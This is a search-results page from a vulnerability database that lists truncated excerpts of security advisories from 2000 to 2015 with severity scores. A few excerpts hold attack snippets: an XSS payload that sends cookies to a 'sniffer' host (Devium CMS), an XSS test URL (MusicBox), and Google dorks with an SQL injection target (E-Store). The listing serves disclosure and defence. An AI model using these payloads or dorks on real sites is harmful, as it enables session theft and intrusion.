Lucene search
Securityvulns, most viewed

47153 matches found

securityvulns
added 2009/10/13 12:00 a.m. | 97 views

Microsoft Security Bulletin MS09-053 - Important Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254)

Microsoft Security Bulletin MS09-053 - Important Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution 975254 Published: October 13, 2009 Version: 1.0 General Information Executive Summary This security update resolves two publicly disclosed...

CVSS 9.3 | AI score 0.4 | EPSS 0.90913 | Exploits 20

securityvulns
added 2009/06/29 12:00 a.m. | 97 views

osTicket v1.6 RC4 Admin Login Blind SQLi

nGenuity Information Services - Security Advisory Advisory ID: NGENUITY-2009-007 osTicket Admin Login Blind SQL Injection Application: osTicket v1.6 RC4 Vendor: osTicket Vendor website: http://www.osticket.com Author: Adam Baldwin [email protected] I. BACKGROUND "osTicket is a widely-us...

AI score 0.2 | Exploits 0

securityvulns
added 2009/06/29 12:00 a.m. | 97 views

[Full-disclosure] [ GLSA 200906-02 ] Ruby: Denial of Service

Gentoo Linux Security Advisory GLSA 200906-02 http://security.gentoo.org/ Severity:...

CVSS 5 | AI score 9 | EPSS 0.08375 | Exploits 2

securityvulns
added 2009/02/12 12:00 a.m. | 97 views

[Suspected Spam][Fwd: Re: Novell-QuickFinder Server Xss & Java remote execution Code]

NULL CODE SERVICES www.nullcode.com.ar Hunting Security Bugs! Novell-QuickFinder Server //Cross-site scripting XSS Remote Java Execution Code...

AI score 0.8 | Exploits 0

securityvulns
added 2009/01/16 12:00 a.m. | 97 views

[waraxe-2009-SA#070] - Multiple Vulnerabilities in MKPortal <= 1.2.1

waraxe-2009-SA070 - Multiple Vulnerabilities in MKPortal <= 1.2.1 Author: Janek Vind "waraxe" Date: 15. January 2009 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-70.html Description of vulnerable software...

AI score 7.1 | Exploits 0

securityvulns
added 2008/10/14 12:00 a.m. | 97 views

Telecom Italia Alice Pirelli routers backdoor discovered to activate telnet/ftp/tftp from internal LAN/WLAN.

saxdax & drpepperONE Discovered embedded backdoor to activate telnet/ftp/tftp/web extended admin interface with Admin privileges, from internal network lan on Alice ADSL CPE Modem/Router, manufactured by Pirelli based on Broadcom platform. saxdax & drpepperONE Router Vendor: Alice Telecom Italia...

AI score 7.2 | Exploits 0

securityvulns
added 2008/09/29 12:00 a.m. | 97 views

Mozilla Foundation Security Advisory 2008-44

Mozilla Foundation Security Advisory 2008-44 Title: resource: traversal vulnerabilities Impact: Moderate Announced: September 23, 2008 Reporter: Boris Zbarsky, Georgi Guninski Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 3.0.2 Firefox 2.0.0.17 Thunderbird 2.0.0.17 SeaMonkey 1.1.12...

CVSS 7.8 | AI score 1.1 | EPSS 0.04438 | Exploits 2

securityvulns
added 2008/09/13 12:00 a.m. | 97 views

[SECURITY] [DSA 1636-1] New Linux 2.6.24 packages fix several vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Debian Security Advisory DSA-1636-1 [email protected] http://www.debian.org/security/ dann frazier Sep 11, 2008 http://www.debian.org/security/faq...

CVSS 9.3 | AI score 1.5 | EPSS 0.04353 | Exploits 12

securityvulns
added 2008/07/12 12:00 a.m. | 97 views

Cisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks Advisory ID: cisco-sa-20080708-dns http://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml Revision 1.0 For Public Release 2008 July 08 1800 UTC GMT...

CVSS 5 | AI score 0.4 | EPSS 0.95182 | Exploits 20

securityvulns
added 2008/06/05 12:00 a.m. | 97 views

VMSA-2008-0009 Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX, VMware ESXi resolve critical security issues

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 VMware Security Advisory Advisory ID: VMSA-2008-0009 Synopsis: Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX,...

CVSS 9.3 | AI score 10 | EPSS 0.10141 | Exploits 4

securityvulns
added 2007/09/13 12:00 a.m. | 97 views

Apache2 Undefined Charset UTF-7 XSS Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Apache2 Undefined Charset UTF-7 XSS Vulnerability Author: SecurityReason Maksymilian Arciemowicz cXIb8O3 Date: - - Written: 08.08.2007 - - Public: 11.09.2007 SecurityReason Research SecurityAlert Id: 46 CVE: CVE-2007-4465 SecurityRisk: Low Affected...

CVSS 4.3 | AI score 7.5 | EPSS 0.26188 | Exploits 0

securityvulns
added 2007/07/05 12:00 a.m. | 97 views

Redirection Vulnerability in wp-pass.php, WordPress 2.2.1

The vulnerability found could allow an attacker to redirect victims to an arbitrary 3rd party site. This site could be a phishing site or contain malware allowing the attacker to steal account credentials or compromise hosts. This vulnerability can be found in Wordpress 2.2, however it is likely...

AI score 1 | Exploits 0

securityvulns
added 2007/04/20 12:00 a.m. | 97 views

NeatUpload vulnerability and fix

Product: NeatUpload Synopsis: A race condition in several versions of the NeatUpload ASP.NET component could sometimes cause portions of responses to be sent to the wrong user, potentially revealing sensitive information to unauthorized users. Vulnerable versions: 1.2.11-1.2.16, 1.1.18-1.1.23, an...

AI score 6.8 | Exploits 0

securityvulns
added 2007/01/30 12:00 a.m. | 97 views

CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability

Title : CascadianFAQ <= 4.1 index.php Remote Blind SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://eclectic-designs.com $$ : Free Dork : This FAQ is powered by CascadianFAQ DorkEx :...

AI score 0.6 | Exploits 0

securityvulns
added 2006/10/26 12:00 a.m. | 97 views

Multiple HTTP response splitting vulnerabilities in SHOP-SCRIPT

Vendor: Shop-Script a division of WebAsyst LLC Application: Shop-Script www.shop-script.com I. Descriptions: Shop-Script is a PHP based shopping cart. Multiple links of shop-script are vulnerable to a new form of application attack technique called HTTP Response splitting aka CRLF Injection. HTTP...

AI score 6.9 | Exploits 0

securityvulns
added 2006/07/25 12:00 a.m. | 97 views

MusicBox <= 2.3.4 XSS SQL injection Vulnerability

MusicBox 2.3.4 http://www.musicboxv2.com PHPinfo page: /phpinfo.php Cross Site Scripting XSS: http://www.target.xx/?id=scriptalert/EllipsisSecurityTest//script&page=0...

AI score 6.8 | Exploits 0

securityvulns
added 2006/07/25 12:00 a.m. | 97 views

XSS in Devium CMS 1.5

Advisory: XSS in Devium CMS 1.5 Home Page: http://www.devium.net/ Vulnerability: XSS in the guestbook. Exploit: scriptimg = new Image; img.src = "http://sniffer/a.jpg?"+document.cookie;/script Vulnerability: Installation path disclosure in the admin panel:...

AI score 0.2 | Exploits 0

securityvulns
added 2006/06/13 12:00 a.m. | 97 views

Microsoft Security Bulletin MS06-021

Microsoft Security Bulletin MS06-021 Cumulative Security Update for Internet Explorer 916281 Published: June 13, 2006 Version: 1.0 Summary Who should read this document: Customers who use Microsoft Windows Impact of Vulnerability: Remote Code Execution Maximum Severity Rating: Critical...

CVSS 10 | AI score 0.5 | EPSS 0.48569 | Exploits 4

securityvulns
added 2005/04/13 12:00 a.m. | 97 views

Microsoft Security Bulletin MS05-018 Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege and Denial of Service (890859)

Microsoft Security Bulletin MS05-018 Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege and Denial of Service 890859 Issued: April 12, 2005 Version: 1.0 Summary Who should read this document: Customers who use Microsoft Windows Impact of Vulnerability: Elevation of Privilege...

CVSS 10 | AI score 0.8 | EPSS 0.21533 | Exploits 0

securityvulns
added 2002/08/25 12:00 a.m. | 97 views

Blazix 1.2 jsp view and free protected folder access

Auriemma Luigi, PivX security advisory Application: Blazix http://www.blazix.com Version: 1.2 and previous Bug: Bad management of files requested with at the end some "bad" characters Risk low: An attacker can view jsp and other server side scripts with the ability to access any password protecte...

AI score 7.3 | Exploits 0

securityvulns
added 2001/10/12 12:00 a.m. | 97 views

Security Update: [CSSA-2001-SCO.25] OpenServer: various scoadmin/sysadm subprograms have buffer overflows

To: [email protected] [email protected] [email protected] [email protected] Do not reply to this mail. This security advisory is being sent from a nonexistent address in order to avoid spam problems. Caldera's contact address for UNIX security issue...

AI score 0.3 | Exploits 0

securityvulns
added 2001/06/07 12:00 a.m. | 97 views

Security Bulletin MS01-030

Title: Incorrect Attachment Handling in Exchange 2000 OWA Can Execute Script Date: 06 June 2001 Software: Microsoft Exchange 2000 Server Outlook Web Access Impact: Run code of attacker's choice Bulletin: MS01-030 Microsoft encourages customers to review the Security Bulletin at:...

AI score 1.5 | Exploits 0

securityvulns
added 2000/12/06 12:00 a.m. | 97 views

Serv-U FTP directory traversal vulnerability (all versions)

Securax-SA-09 Security Advisory belgian.networking.security Dutch Topic: Catsoft serv-U FTP Directory Transversal Vulnerability Announced: 2000-12-03 Updated...

AI score 7.2 | Exploits 0

securityvulns
added 2015/08/02 12:00 a.m. | 96 views

[USN-2694-1] PCRE vulnerabilities

Ubuntu Security Notice USN-2694-1 July 29, 2015 pcre3 vulnerabilities A security issue affects these releases of Ubuntu and its derivatives: - Ubun...

CVSS 7.5 | AI score 1.1 | EPSS 0.09157 | Exploits 4

securityvulns
added 2015/06/21 12:00 a.m. | 96 views

[SECURITY] [DSA 3291-1] drupal7 security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Debian Security Advisory DSA-3291-1 [email protected] https://www.debian.org/security/ Sebastien Delafond June 18, 2015 https://www.debian.org/security/faq...

CVSS 5.8 | AI score 1.1 | EPSS 0.02763 | Exploits 0

securityvulns
added 2015/06/14 12:00 a.m. | 96 views

XSS vulnerability Adobe Connect 9.3 (CVE-2015-0343)

Advisory: Adobe Connect Reflected XSS Author: Stas Volfus Bugsec Information Security LTD Vendor URL: http://www.adobe.com/ Status: Vendor Notified Vulnerability Description: Adobe Connect Central version: 9.3 is vulnerable to Reflected XSS Cro...

CVSS 4.3 | AI score 0.1 | EPSS 0.03194 | Exploits 1

securityvulns
added 2015/06/08 12:00 a.m. | 96 views

[SECURITY] [DSA 3276-1] symfony security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Debian Security Advisory DSA-3276-1 [email protected] http://www.debian.org/security/ David Prevot May 31, 2015 http://www.debian.org/security/faq...

CVSS 4.3 | AI score 1.3 | EPSS 0.08269 | Exploits 0

securityvulns
added 2015/05/05 12:00 a.m. | 96 views

[slackware-security] proftpd (SSA:2015-111-12)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 slackware-security proftpd SSA:2015-111-12 New proftpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue. Here are the details from the Slackware 14.1 ChangeLog:...

CVSS 10 | AI score 8.5 | EPSS 0.96803 | Exploits 21

securityvulns
added 2014/12/11 12:00 a.m. | 96 views

Asterisk DoS

WebSocket Server request parsing DoS...

AI score 3 | Exploits 0 | References 1 | Affected Software 1

securityvulns
added 2014/11/10 12:00 a.m. | 96 views

CVE-2014-6617 Softing FG-100 Backdoor Account

COMPASS SECURITY ADVISORY http://www.csnc.ch/en/downloads/advisories.html Product: Softing FG-100 PB Vendor: Softing AG www.softing.com CVD ID: CVE-2014-6617 Subject: Backdoor Account Risk: High Effect: Remotely exploitable Author: Ingmar Rosenhagen Daniel Marzin Johannes Klick Date: 05.11.2014...

CVSS 10 | AI score 9.4 | EPSS 0.04543 | Exploits 2

securityvulns
added 2014/11/03 12:00 a.m. | 96 views

[ MDVSA-2014:200 ] bugzilla

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:200 http://www.mandriva.com/en/support/security/ Package : bugzilla Date : October 21, 2014 Affected: Business Server 1.0 Problem Description: Updated bugzilla packages fix security vulnerabilities: If a new...

CVSS 5 | AI score 6.2 | EPSS 0.02326 | Exploits 0

securityvulns
added 2014/10/14 12:00 a.m. | 96 views

[Onapsis Security Advisory 2014-027] SAP HANA Multiple Reflected Cross Site Scripting Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Onapsis Security Advisory 2014-027: SAP HANA Multiple Reflected Cross Site Scripting Vulnerabilities 1. Impact on Business: By exploiting this vulnerability a remote unauthenticated attacker would be able to attack other users of...

AI score 6.4 | Exploits 0

securityvulns
added 2014/10/14 12:00 a.m. | 96 views

CVE-2014-4958: Stored Attribute-Based Cross-Site Scripting (XSS) Vulnerability in Telerik UI for ASP.NET AJAX RadEditor Control

All versions of the popular UI for ASP.NET AJAX RadEditor Control product by Telerik may be affected by a high-risk stored attribute-based cross-site scripting XSS vulnerability that is assigned CVE-2014-4958. This WYSIWYG rich text editor is “...what Microsoft chose to use in MSDN, CodePlex,...

CVSS 4.3 | AI score 8.8 | EPSS 0.01979 | Exploits 0

securityvulns
added 2014/08/18 12:00 a.m. | 96 views

CVE-2014-3577: Apache HttpComponents client: Hostname verification susceptible to MITM attack

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Security Advisory - Apache Software Foundation Apache HttpComponents / hc.apache.org Hostname verification susceptible to MITM attack CVE-2014-3577 / CVSS 1.4 Apache HttpComponents prior to revision 4.3.5/4.0.2 may be susceptible to a 'Man in the Midd...

CVSS 5.8 | AI score 6.3 | EPSS 0.09149 | Exploits 1

securityvulns
added 2014/07/14 12:00 a.m. | 96 views

python security vulnerabilities

json information leak, CGIHTTPServer unauthorized files access and code execution, lz4 integer overflow...

CVSS 4.3 | AI score 3.1 | EPSS 0.24148 | Exploits 6 | References 3 | Affected Software 1

securityvulns
added 2014/06/26 12:00 a.m. | 96 views

CVE-2014-2385 - Multiple Cross Site Scripting in Sophos Antivirus Configuration Console (Linux)

Vulnerability title: Multiple Cross Site Scripting in Sophos Antivirus Configuration Console Linux CVE: CVE-2014-2385 Vendor: Sophos Product: Antivirus Affected version: 9.5.1 Fixed version: 9.6.1 Reported by: Pablo Catalina Details: The Configuration Console of Sophos Antivirus 9.5.1 Linux does...

CVSS 4.3 | AI score 6.1 | EPSS 0.04464 | Exploits 1

securityvulns
added 2014/06/14 12:00 a.m. | 96 views

[ MDVSA-2014:114 ] squid

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:114 http://www.mandriva.com/en/support/security/ Package : squid Date : June 10, 2014 Affected: Business Server 1.0 Problem Description: Updated squid packages fix security vulnerability: Due to incorrect...

CVSS 5 | AI score 8.5 | EPSS 0.3263 | Exploits 1

securityvulns
added 2014/05/05 12:00 a.m. | 96 views

E-Store (1.0 & 2.0) <= SQL Injection Vulnerability

Exploit Author: Nawaf Alkeraithe for "E-store 1.0": Google Dork: "Powered by: PD" inurl:"page.php?id" Vulnerable page: http://target/page.php?id=SQL Injection for "E-store 2.0": Google Dork: "Powered by: PD"...

AI score 1.8 | Exploits 0

securityvulns
added 2014/03/13 12:00 a.m. | 96 views

APPLE-SA-2014-03-10-1 iOS 7.1

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-03-10-1 iOS 7.1 iOS 7.1 is now available and addresses the following: Backup Available for: iPhone 4 and later, iPod touch 5th generation and later, iPad 2 and later Impact: A maliciously crafted backup can alter the filesystem...

CVSS 8.8 | AI score 0.1 | EPSS 0.10117 | Exploits 13

securityvulns
added 2014/02/11 12:00 a.m. | 96 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...

CVSS 9.3 | AI score 1.6 | EPSS 0.42895 | Exploits 32 | References 11 | Affected Software 11

securityvulns
added 2013/12/01 12:00 a.m. | 96 views

[USN-2035-1] Ruby vulnerabilities

Ubuntu Security Notice USN-2035-1 November 27, 2013 ruby1.8, ruby1.9.1 vulnerabilities A security issue affects these releases of Ubuntu and its...

CVSS 6.8 | AI score 0.6 | EPSS 0.34968 | Exploits 4

securityvulns
added 2013/10/28 12:00 a.m. | 96 views

Cisco Identity Services Engine multiple security vulnerabilities

Authentication bypass, code execution...

CVSS 9.3 | AI score 3.3 | EPSS 0.99998 | Exploits 18 | Affected Software 1

securityvulns
added 2013/06/05 12:00 a.m. | 96 views

[security bulletin] HPSBMU02883 SSRT101227 rev.1 - HP Data Protector, Remote Increase of Privilege, Denial of Service (DoS), Execution of Arbitrary Code

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03781657 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03781657 Version: 1 HPSBMU02883...

CVSS 10 | AI score 1.3 | EPSS 0.90162 | Exploits 12

securityvulns
added 2013/04/22 12:00 a.m. | 96 views

[USN-1801-1] curl vulnerability

Ubuntu Security Notice USN-1801-1 April 16, 2013 curl vulnerability A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu...

CVSS 5 | AI score 0.4 | EPSS 0.04986 | Exploits 1

securityvulns
added 2013/04/02 12:00 a.m. | 96 views

[USN-1787-1] Linux kernel vulnerabilities

Ubuntu Security Notice USN-1787-1 April 02, 2013 linux vulnerabilities A security issue affects these releases of Ubuntu and its derivatives: -...

CVSS 6.2 | AI score 6.2 | EPSS 0.005 | Exploits 2

securityvulns
added 2013/04/01 12:00 a.m. | 96 views

Multiple XSS vulnerabilities in IBM Lotus Domino

Hello 3APA3A! I want to warn you about multiple Cross-Site Scripting vulnerabilities in IBM Lotus Domino. Last year I've announced multiple vulnerabilities in IBM software and after IBM fixed many of them, I've disclosed them. These are new vulnerabilities in Domino, which I've found at 03.05.201...

CVSS 4.3 | AI score 0.7 | EPSS 0.01148 | Exploits 3

securityvulns
added 2013/02/11 12:00 a.m. | 96 views

[SECURITY] [DSA 2616-1] nagios3 security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Debian Security Advisory DSA-2616-1 [email protected] http://www.debian.org/security/ Jonathan Wiltshire February 03, 2013 http://www.debian.org/security/faq...

CVSS 7.5 | AI score 1.5 | EPSS 0.6645 | Exploits 15

securityvulns
added 2013/01/14 12:00 a.m. | 96 views

US-CERT Alert TA13-010A - Oracle Java 7 Security Manager Bypass Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Awareness System US-CERT Alert TA13-010A Oracle Java 7 Security Manager Bypass Vulnerability Original release date: January 10, 2013 Last revised: -- Systems Affected Any system using Oracle Java 7 1.7, 1.7.0 including Java Platform...

AI score 0.6 | Exploits 0

securityvulns
added 2012/12/02 12:00 a.m. | 96 views

[SECURITY] [DSA 2579-1] apache2 security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Debian Security Advisory DSA-2579-1 [email protected] http://www.debian.org/security/ Stefan Fritsch November 30, 2012 http://www.debian.org/security/faq...

CVSS 5 | AI score 1.1 | EPSS 0.1747 | Exploits 3

securityvulns
added 2012/10/05 12:00 a.m. | 96 views

[USN-1595-1] libxslt vulnerabilities

Ubuntu Security Notice USN-1595-1 October 04, 2012 libxslt vulnerabilities A security issue affects these releases of Ubuntu and its derivatives: -...

CVSS 6.8 | AI score 1 | EPSS 0.02455 | Exploits 1

Total number of security vulnerabilities: 5000